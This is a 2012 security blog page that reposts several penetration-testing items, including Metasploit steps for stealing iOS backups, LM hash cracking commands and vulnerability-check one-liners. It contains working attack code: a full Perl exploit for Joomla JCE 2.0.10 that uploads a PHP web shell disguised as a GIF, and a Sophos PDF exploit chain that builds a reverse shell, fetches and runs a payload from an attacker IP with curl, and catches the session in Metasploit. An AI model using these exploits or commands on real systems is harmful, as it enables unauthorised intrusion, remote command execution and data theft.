Nov 10, 2012

DVWA on the cloud.


If you want to learn web security, I think DVWA is a good choice to practice about that. And I'm so excite that DVWA now on cloud with Hack.me website. You can learn and hack DVWA from https://hack.me/101047/dvwa-107.html

Try it if you love web security :)

 
 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Nov 9, 2012

Metasploit post exploitation scripts to steal iOS 5 backups By SecurityLearn

If you want full article, please go to the Source.

Metasploit contains a post exploitation module using which we can steal the Apple iOS backup files from a victim’s computer. However the existing module was designed for iOS 4 backups and does not support the latest iOS 5 backups. I have updated the scripts to make it work with iOS 5 backups.

Usage Steps:v
1. Download the apple_ios_backup.rb and place it in /opt/metasploit/msf3/modules/post/multi/gather/ directory.
2. Download the apple_backup_manifestdb.rb and place it in /opt/metasploit/msf3/lib/rex/parser/ directory.
3. Open the Metasploit using msfconsole.
4. Use meterpreter as a payload and exploit a vulnerability in the target system.


The above script searches for the iOS backup files in the default iTunes backup locations. If it does not find any backup in the target system, it will displays ‘ No users found with an iTunes backup directory’ message. If it finds the backup it dumps all the files and stores them as db files in the ~/.msf4/loot/ directory.
iPhone backup path in windows & Mac OS x

Source: http://www.securitylearn.net/2012/09/09/metasploit-post-exploitation-scripts-to-steal-ios-5-backups/


 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Nov 7, 2012

Sophos Anti-Virus Sophail PDF Vulnerability Metasploit Payload Demo

If you want details, please go to the Source. 
 
1) Create a Mac OS X Metasploit payload:

msfpayload osx/x86/shell_reverse_tcp LHOST=192.168.178.26 X > mac_os_x_payload

2) Modify Sophail shellcode.asm file with, for example:

.command: db "curl -s http://192.168.178.26/mac_os_x_payload > mac_os_x_payload | chmod u+x mac_os_x_payload && ./mac_os_x_payload", 0

3) Make 4) Upload index.html, exploit.bin and exploit.png on a web server 5) Initiate a Metasploit multihandler

use exploit/multi/handler set PAYLOAD osx/x86/shell_reverse_tcp set LHOST 192.168.178.26 exploit -j

6) On the target surf index.html file

7) Exploit the session :) 

session -i 1 id /sbin/ifconfig uname -a 
 
Source: http://eromang.zataz.com/2012/11/06/sophos-anti-virus-sophail-pdf-vulnerability-metasploit-payload-demo/ 


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Crack LM Hashes

I cut this tip from "Password Audit On Windows Active Directory", if you want the step or another detail, please go to the Source.


Crack the Hashes
The default way that windows stores hashes is with LAN Manager (LM). This means that if the password is 14 characters or less, regardless of complexity, it stores them in two separate 7 character passwords (so to speak). Which means that when you crack a 14 character LM hash, it’s really only cracking two separate 7 character passwords. Which doesn’t take all that long. If the passwords are longer than 14 characters, it takes a lot longer to crack. So what I did was separate out the 14 character or less passwords from the hash dump. “How?” you say? You can identify the LM hash versus the NTLM hashes. The NTLM hashes start with “aad3b435″. So I excluded them from my crack for now to crack later. (Note: You can use GPO settings to force all passwords to be stored in NTLM regardless of length.)
Type the following:
root@bt:~# cat achmed_dc.txt | grep ":::" | grep -v ":aad3b4" > achmedhash.txt

This will pull the hash lines “:::” from our output file from metasploit, then look for any “aad3b4″ lines and omit them (-v), and output the rest to achmedhash.txt. This is the file we will send to john. Type the following:
root@bt:~# /pentest/passwords/john/john --format=lm achmedhash.txt


Source: http://ben0xa.com/password-audit-on-windows-active-directory/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Nov 6, 2012

XSS For Defacement

Nice Example for XSS.

 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Android SMS Spoofer

If you want to download this app(apk), please go to the Source.

Proof of Concept app which takes advantage of Android's SmsReceiverService being exported to fake an incoming SMS with no permissions.
On 2012-10-30 NCSU notified Google about a "Smishing" vulnerability (1) in Android. The vulnerability appears to be due to Android exporting SmsReceiverService in the com.android.mms app with no apparent restrictions. A third party app can therefore pass an explicit Intent to the SMS app containing a fake SMS message and the SMS app will process it.
This issue has been known about and used for some time (2,3,4) by test apps and apps designed to intercept, alter and pass on SMS messages. NCSU were the first to publically highlight the security vulnerability that arises from this functionality, namely that a user can be tricked into taking action on a faked SMS message.
This PoC app simply wraps existing code already made public so that the issue can be validated and countermeasures designed while users wait for the patch.

Source: https://github.com/thomascannon/android-sms-spoof


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Bash One-liners to Validate Vulnerabilities on Multiple Hosts By Amit Bagree.

It's very helpful to validate vulnerability with one-line command line.

CVE-2011-1473

McAfee Vulnerability Manager: Web Server Supports Outdated SSLv2 Protocol
Nessus:
SSL Version 2 (v2) Protocol Detection
 root@bt:~# for i in `cat Affected-SSLv2-IPs.txt`; do echo -e "\n----START "$i"----" ; echo -e "HEAD / HTTP/1.0\n\n" | openssl s_client -connect "$i" -ssl2; echo -e "\n----END "$i"----"; done > SSLv2-Output.txt


CVE-2009-3555

McAfee Vulnerability Manager: TLS / SSL Man-In-The-Middle Renegotiation Vulnerability
Nessus:
SSL / TLS Renegotiation DoS & SSL / TLS Renegotiation Handshakes MiTM Plaintext Data Injection
  root@bt:~# paste SSL-Renego-IPs.txt | while read IP port; do echo "----START "$IP":"$port"----"; echo -e "HEAD / HTTP/1.0\nR\n\n" | ncat --ssl "$IP" "$port"; echo -e "\n----END "$IP":"$port"----\n"; done


Where SSL-Renego-IPs.txt has an IP address and port number on each line separated by a space. You can use OpenSSL instead of Ncat as well. An online test tool is available here.

CVE-2008-1447

McAfee Vulnerability Manager: ISC BIND DNS Out-Of-Bailiwick Cache Poisoning
Nessus:
Multiple Vendor DNS Query ID Field Prediction Cache Poisoning
  root@bt:~# for i in `DNS-CachePoison-IPs.txt`; do dig @"$i" +short porttest.dns-oarc.net TXT; done; > DNS-CachePoison-Output.txt


CVE-2006-0987

Nessus: DNS Server Spoofed Request Amplification DDoS
  root@bt:~# for i in `cat DNSRootAmpDoS-IPs.txt`; do dig @"$i" . NS; done > DNSRootAmpDoS-Output.txt


CVE-2002-1623

McAfee Vulnerability Manager: Internet Key Exchange (IKE) Aggressive Mode with Pre-Shared Key
Nessus:
IKE Server Allows Aggressive Mode for Shared Secret Authentication
  root@bt:~# for i in `cat IKE-AggresiveMode-IPs.txt`; do sudo ike-scan -M -A "$i"; done > IKE-AggresiveMode-Output.txt


CVE-2003-1567, CVE-2004-2320, CVE-2010-0386

McAfee Vulnerability Manager: Web Server HTTP TRACE or TRACK Methods Enabled
Nessus:
HTTP TRACE / TRACK Methods Allowed
  root@bt:~# paste Trace-IPs-SSL.txt | while read IP port; do echo "----START "$IP":"$port"----"; echo -e "TRACE / HTTP/1.0\n\n" | ncat --ssl "$IP" "$port"; echo -e "\n----END "$IP":"$port"----\n"; done > Trace-SSL-IPs-Output.txt


CVE-2006-3918, CVE-2007-5944

McAfee Vulnerability Manager: F-Secure Policy Manager Expect Header Cross-Site Scripting
Nessus:
Web Server Expect Header XSS
  root@bt:~# for i in `cat ExpectHeaderXss-IPs.txt`; do echo -e "\n----START "$i"----" ; echo -e "GET / HTTP/1.0\nExpect: <script>alert(1)</script>\n\n" | openssl s_client -quiet -connect "$i":443; echo -e "\n----END "$i"----"; done > M-ExpectHeaderXss-Output.txt


CVE-2007-6203

Nessus: Apache HTTP Method Request Entity XSS
  root@bt:~# for i in `cat ApacheMethodRequestXSS-IPs.txt`; do echo -e "\n----START "$i"----" ; echo -e "<script>alert(1)</script> / HTTP/1.1\nHost: foundstone.com\nConnection: close\nContent-length: -1\n\n" | nc "$i" 80; echo -e "\n----END "$i"----"; done > ApacheMethodRequestXSS-Output.txt


SSL Ciphers and Certs

Couple of quick tips/tools for checking weak SSL ciphers, expired SSL certificates, certificates with weak signature algorithms, etc...

SSLSmart

Download here. Simply import your IPs with port info like 127.0.0.1:8080 from a text file and click ‘Start Test’. The advantage with SSLSmart is that if you perform a ‘Content’ test you can catch that pesky system which would allow a weak cipher connection but then display a page saying you are not good enough to connect to it. The two methods below won’t catch this false positive.

SSLAudit.pl

Another nice tool is this Perl script SSLAudit.pl. The nice feature about this is that the results are graded as per the SSLLabs SSL Server Rating Guide. If you are providing a list of IPs, you will notice quickly that the tool errors out without performing the checks if there is a hostname mismatch (Errors - Hostname verification failed, Hostname mismatch). Worry not! just disable the mismatch check. To apply the patch:
root@bt:~# wget https://sslaudit.googlecode.com/files/SSLAudit%20r6%20%2820100119%29.zip
root@bt:~# unzip SSLAudit\ r6\ \(20100119\).zip 
root@bt:~# wget https://github.com/OpenSecurityResearch/pentest-scripts/blob/master/SSLAudit-r6-20100119-RemoveHostnameCheck.patch
root@bt:~# patch -p1 < SSLAudit-r6-20100119-RemoveHostnameCheck.patch


Then you're all ready to:
  root@bt:~# cat All_SSL_IPs.txt | while read IP port; do echo -e "\n----START "$IP":"$port"----”; perl SSLAudit.pl "$IP" "$port"; echo -e "\n----END "$IP":"$port"----\n"; done > All_SSLAudit_Output.txt


Oh by the way you would need the following modules for SSLAudit to work:
  • inifiles
  • libio-socket-ssl-perl
  • libtime-modules-perl

ssl-enum-ciphers.nasl

  root@bt:~# nmap --script ssl-enum-ciphers -p port/s IP-Address/es


Non-Recursive DNS Queries

  root@bt:~# for i in `cat DNS-NonRecursive-IPs.txt`; do dig @"$i" www.google.com A +norecurse; done > DNS-NonRecurive-Output.txt


Assuming www.google.com would be cached. You can make it cache first if you wish.

Checking Remote NTP version

  root@bt:~# for i in `cat NTPVersion-IPs.txt`; do echo -e "\n----START "$i"----" ; ntpq -c readvar "$i"; echo -e "\n----END "$i"----"; done > NTPVersion-Output.txt


Check XSS in URL/URL parameter using Curl

  root@bt:~# curl 'http://127.0.0.1/<script>alert(1)</script>' | grep 'alert(1)'


Download a specific file from multiple IPs

  root@bt:~# for i in `cat IPs.txt`; do curl -o "$i"_crossdomain.xml “http://"$i"/crossdomain.xml”; done
for i in `cat IPs-SSL.txt`; do curl -k -o "$i"_robots.txt “https://"$i"/robots.txt”; done

 

Source: http://blog.opensecurityresearch.com/2012/10/for-loops-bash-one-liners-to-validate.html

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

PySQLi - Python SQL injection framework

PySQLi is a python framework designed to exploit complex SQL injection vulnerabilities. It provides dedicated bricks that can be used to build advanced exploits or easily extended/improved to fit the case.

Source: https://github.com/sysdream/pysqli

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Joomla JCE 2.0.10 Shell Upload Exploit

After release of vendor supplied patch for JCE's vulnerabilities, AmnPardaz is going to submit related POC for this issue in Perl and PHP after one month for educational purposes.

Perl Version:
 
######################################### www.bugreport.ir ########################################
#
#                     AmnPardaz Security Research & Penetration Testing Group
#
#
# Title:                  Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 - PHP Version
# Vendor:                 http://www.joomlacontenteditor.net
# Vulnerable Version:     JCE 2.0.10 (prior versions also may be affected)
# Exploitation:           Remote with browser
# Original Advisory:      http://www.bugreport.ir/index_78.htm
# Vendor supplied patch:  http://www.joomlacontenteditor.net/news/item/jce-2011-released
# CVSS2 Base Score:       (AV:N/AC:L/Au:N/C:P/I:P/A:P) --> 7.5        
# Coded By:               iraqi h4ck
###################################################################################################
use IO::Socket;
use LWP::Simple;
system("cls");
if(!defined($ARGV[0])) {
print "\n\n\t.::. Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 .::.\n\n";
print "\t||||        Coded by: iraqi h4ck (admin[@]0-Day[dot]net)      ||||\n\n";
print "\t+--> Usage:   perl $0 <host>        <--+\n";
print "\t+--> Example: perl $0 localhost     <--+\n\n";
exit; }
print "\n\n\t.::. Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 .::.\n\n";
print "\t||||        Coded by: iraqi h4ck (admin[@]0-Day[dot]net)      ||||\n\n";
$TARGET = $ARGV[0];
$PORT   = "80";
$SCRIPT = "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20";
$SHELL  = "/images/stories/0day.php?cmd=";
$HTTP   = "http://";
 
$header1G = "GET $SCRIPT HTTP/1.1";
$header1H = "HEAD /images/stories/0day.php HTTP/1.1";
$header1P = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1";
$header1P2 = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1";
$header2 = "Host: $TARGET";
$header3 = "User-Agent: BOT/0.1 (BOT for JCE)";
$header4 = "Content-Type: multipart/form-data; boundary=---------------------------41184676334";
$header5 = "Content-Length: 769";
$header6 = "-----------------------------41184676334";
$header7 = 'Content-Disposition: form-data; name="upload-dir"';
$header8 = '/';
$header9 = 'Content-Disposition: form-data; name="Filedata"; filename=""';
$header10 = 'Content-Type: application/octet-stream';
$header11 = 'Content-Disposition: form-data; name="upload-overwrite"';
$header12 = "0";
$header13 = 'Content-Disposition: form-data; name="Filedata"; filename="0day.gif"';
$header14 = 'Content-Type: image/gif';
$header15 = 'GIF89aG';
$header16 = "<? system($_GET['cmd']);exit; ?>";
$header17 = 'Content-Disposition: form-data; name="upload-name"';
$header18 = '0day';
$header19 = 'Content-Disposition: form-data; name="action"';
$header20 = 'upload';
$header21 = "-----------------------------41184676334--";
$header22 = 'X-Request: JSON';
$header23 = 'Content-Type: application/x-www-form-urlencoded; charset=utf-8';
$header25 = 'json={"fn":"folderRename","args":["/0day.gif","0day.php"]}';
$header24 = "Content-Length: ".length($header25)."";
 
############################################### Packet 1 --> Checking Exploitability #########################################################
print "\n[*] Checking Exploitability ...\n\n";
sleep 2;
$pageURL=$TARGET.$SCRIPT;
$simplePage=get($pageURL);
@arr = ("2.0.11</title","2.0.12</title","2.0.13</title","2.0.14</title","2.0.15</title","1.5.7.10</title","1.5.7.11</title","1.5.7.12</title","1.5.7.13</title","1.5.7.14</title");
while (($count!=10) && ($die != 1)) {
foreach $arr(@arr){
if ($simplePage =~ m/$arr/) {
print "\n[*] Target patched.\n\n";
$die = 1;
} else {
$count++;
}
}
}
if ($count==5) {print "[*] Target is exploitable.\n\n"};
############################################### Packet 2 --> Uploading shell as a gif file #########################################################
$remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET" ,PeerPort=>"$PORT")
|| die "Can't connect to $TARGET";
print "[*] Trying to upload 0day.gif ...\n\n";
print $remote "$header1P\n$header2\n$header3\n$header4\n$header5\n\n$header6\n$header7\n\n$header8\n$header6\n$header9\n$header10\n\n\n$header6\n$header11\n\n$header12\n$header6\n$header13\n$header14\n\n$header15\n$header16\n$header6\n$header17\n\n$header18\n$header6\n$header19\n\n$header20\n$header21\n\n";
sleep 2;
############################################### Packet 3 --> Change Extension from .gif to .php #########################################################
print "[*] Trying to change extension from .gif to .php ...\n\n";
$remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET" ,PeerPort=>"$PORT")
|| die "Can't connect to $TARGET";
print $remote "$header1P2\n$header2\n$header3\n$header23\n$header22\n$header24\n\n$header25\n\n";
############################################### Packet 4 --> Check for successfully uploaded #########################################################
$shellurl=$TARGET.$SHELL;
$output=get($shellurl);
while ($output = <$remote> ) {
if ($output =~ /200 OK/) {
print "[+] 0day.php was successfully uploaded\n\n";
print "[+] Path:".$TARGET.$SHELL."id\n";
}}

Source: http://www.1337day.com/exploits/19691

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Nov 5, 2012

Howto: Fix Firefox Error "your firefox profile cannot be loaded. it may be missing or inaccessible" On Ubuntu

When I upgraded my Firefox to the latest version complete, I can't open it and it says "your firefox profile cannot be loaded. it may be missing or inaccessible". So I think because my current user that run Firefox startup don't have permission to open or create the new profile that create from installer(I think it use root permission for that). So this post is how to fix it. just use

chown -R USER:GROUP /home/USER/.mozilla/

Now the problem has gone, have a nice day. :)

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |